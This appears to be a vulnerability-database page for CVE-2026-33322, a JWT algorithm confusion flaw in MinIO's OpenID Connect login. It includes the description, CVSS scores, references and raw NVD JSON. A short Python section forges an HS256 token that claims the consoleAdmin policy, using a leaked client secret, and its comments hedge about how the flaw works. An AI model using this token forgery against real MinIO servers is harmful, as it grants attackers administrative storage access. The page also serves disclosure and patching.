CVE-2026-33322

Description

MinIO is a high-performance object storage system. From RELEASE.2022-11-08T05-27-07Z to before RELEASE.2026-03-17T21-25-16Z, a JWT algorithm confusion vulnerability in MinIO's OpenID Connect authentication allows an attacker who knows the OIDC ClientSecret to forge arbitrary identity tokens and obtain S3 credentials with any policy, including consoleAdmin. This issue has been patched in RELEASE.2026-03-17T21-25-16Z.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - VULNERABLE

MinIO RELEASE.2022-11-08T05-27-07Z 到 RELEASE.2026-03-17T21-25-16Z 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import jwt
import time

# PoC for CVE-2026-33322: MinIO JWT Algorithm Confusion
# Description: Forge a JWT using the leaked OIDC ClientSecret via HS256.
# Prerequisite: Attacker knows the 'client_secret' used in MinIO OIDC config.

client_secret = "LEAKED_OIDC_CLIENT_SECRET"

# Malicious payload claiming admin privileges
payload = {
    "sub": "attacker",
    "act": "admin",
    "policy": "consoleAdmin",  # Highest privilege
    "exp": int(time.time()) + 3600,
    "iat": int(time.time())
}

# Sign the token with HS256 (HMAC) using the client secret.
# The vulnerability is that the server might expect RS256 (RSA)
# but accepts HS256, verifying it with the public key treated as a secret, or directly with the secret.
forged_token = jwt.encode(payload, client_secret, algorithm="HS256")

print(f"[+] Forged JWT Token: {forged_token}")
print("[+] Send this token to the MinIO STS endpoint to obtain S3 credentials.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33322
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33322
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33322/
[4] VulDB https://vuldb.com/cve/CVE-2026-33322
[5] https://github.com/minio/minio/security/advisories/GHSA-5cx5-wh4m-82fh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33322", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:27.857", "lastModified": "2026-04-08T19:05:00.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MinIO is a high-performance object storage system. From RELEASE.2022-11-08T05-27-07Z to before RELEASE.2026-03-17T21-25-16Z, a JWT algorithm confusion vulnerability in MinIO's OpenID Connect authentication allows an attacker who knows the OIDC ClientSecret to forge arbitrary identity tokens and obtain S3 credentials with any policy, including consoleAdmin. This issue has been patched in RELEASE.2026-03-17T21-25-16Z."}, {"lang": "es", "value": "MinIO es un sistema de almacenamiento de objetos de alto rendimiento. Desde RELEASE.2022-11-08T05-27-07Z hasta antes de RELEASE.2026-03-17T21-25-16Z, una vulnerabilidad de confusión de algoritmo JWT en la autenticación OpenID Connect de MinIO permite a un atacante que conoce el OIDC ClientSecret forjar tokens de identidad arbitrarios y obtener credenciales S3 con cualquier política, incluyendo consoleAdmin. Este problema ha sido parcheado en RELEASE.2026-03-17T21-25-16Z."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*", "versionStartIncluding": "2022-11-08t05-27-07z", "versionEndExcluding": "2026-03-17t21-25-16z", "matchCriteriaId": "EF0498AE-5809-41DD-A2B5-FCFF799B18F2"}]}]}], "references": [{"url": "https://github.com/minio/minio/security/advisories/GHSA-5cx5-wh4m-82fh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}